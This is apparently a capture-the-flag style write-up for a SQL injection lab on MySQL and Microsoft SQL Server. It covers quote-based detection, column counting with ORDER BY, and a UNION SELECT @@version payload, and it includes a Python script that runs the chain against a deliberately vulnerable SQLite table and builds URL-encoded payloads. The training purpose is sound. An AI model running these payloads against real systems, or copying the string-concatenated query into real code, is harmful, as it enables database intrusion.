04 - SQL injection attack, querying the database type and version on MySQL and Microsoft
Given : Injection point (product category parameter) , Database (MySQL or Microsoft SQL Server)
End goal : Display the database version string
Start the lab by clicking on the ACCESS THE LAB button
As usual , intercept the request in Burp Suite, click on any category, and the intercepted request looks like :
This lab is similar to the previous lab. Putting a single quote in the category parameter gives a 500 error, which indicates a possible SQLi. Then use the ORDER BY method to find the number of columns returned by the query: increase the index (ORDER BY 1, ORDER BY 2, ...) until the application errors out. This lab also has 2 columns, because ORDER BY 2 works but ORDER BY 3 gives a 500 error :
So the query to inject would be ' UNION SELECT @@version,NULL-- (one expression per column found above; @@version returns the version string on both MySQL and Microsoft SQL Server). In the request the category parameter becomes :
'+UNION+SELECT+@@version,NULL--+
Note : MySQL requires a space after the -- comment sequence, so the trailing space must be URL-encoded (+ or %20) or it is dropped from the request. Alternatively end the payload with # which MySQL also treats as a comment. Microsoft SQL Server does not require the space after --.
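The whole procedure (detection, ORDER BY column counting, then the UNION payload) as an added offline example; this is not code from the lab or the write-up. It runs the same injection against a constructed in-memory SQLite table, so sqlite_version() stands in for @@version, and the lab_payload() helper only builds the URL-encoded category value for the real MySQL/MSSQL target without sending anything:

```python
import sqlite3
from urllib.parse import quote

# Constructed sample rows (not the lab's data): two displayed columns,
# matching the two columns the ORDER BY probe finds in the write-up.
PRODUCTS = [
    ("Gift Box", "Gifts"),
    ("Pet Rock", "Pets"),
    ("Tea Set", "Gifts"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT, category TEXT, released INTEGER)")
    conn.executemany("INSERT INTO products VALUES (?, ?, 1)", PRODUCTS)
    return conn


def vulnerable_lookup(conn, category):
    """Deliberately vulnerable, like the lab: the category value is
    concatenated straight into the SQL string inside a quoted literal."""
    sql = ("SELECT name, category FROM products "
           f"WHERE category = '{category}' AND released = 1")
    return conn.execute(sql).fetchall()


def is_injectable(conn):
    """A lone single quote breaks the quoting and raises a syntax error,
    the offline equivalent of the lab's 500 response."""
    try:
        vulnerable_lookup(conn, "Gifts'")
        return False
    except sqlite3.OperationalError:
        return True


def probe_column_count(conn, max_cols=10):
    """ORDER BY method: bump the column index until the database errors.
    The last index that succeeded is the number of columns in the query."""
    count = 0
    for n in range(1, max_cols + 1):
        try:
            vulnerable_lookup(conn, f"Gifts' ORDER BY {n}--")
            count = n
        except sqlite3.OperationalError:
            break
    return count


def extract_version(conn, ncols):
    """UNION SELECT with exactly ncols expressions. The first carries the
    version, the rest are NULL so types never clash. sqlite_version() is
    the stand-in for @@version in this offline demo."""
    exprs = ["sqlite_version()"] + ["NULL"] * (ncols - 1)
    payload = "Gifts' UNION SELECT " + ",".join(exprs) + "--"
    for row in vulnerable_lookup(conn, payload):
        if row[1] is None:          # only the injected row has NULL here
            return row[0]
    return None


def lab_payload(ncols, comment="-- "):
    """URL-encoded category value for the real MySQL/MSSQL target.
    Default comment keeps the trailing space MySQL needs after --; it is
    encoded as %20 so the request does not lose it. Pass "#" for MySQL's
    other comment syntax (encoded as %23)."""
    exprs = ["@@version"] + ["NULL"] * (ncols - 1)
    raw = "' UNION SELECT " + ",".join(exprs) + comment
    return quote(raw, safe="")


def run_attack():
    """Full chain against the local table: returns (injectable, ncols, version)."""
    conn = make_db()
    inj = is_injectable(conn)
    ncols = probe_column_count(conn)
    return inj, ncols, extract_version(conn, ncols)


if __name__ == "__main__":
    injectable, ncols, version = run_attack()
    print(f"injectable={injectable} columns={ncols} version={version}")
    print("category=" + lab_payload(ncols))
    print("category=" + lab_payload(ncols, "#"))
```

The NULL padding is what makes the UNION row legal once the column count is known; if the real lab returned three columns, lab_payload(3) would emit @@version,NULL,NULL with the same comment handling.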
Lab solved :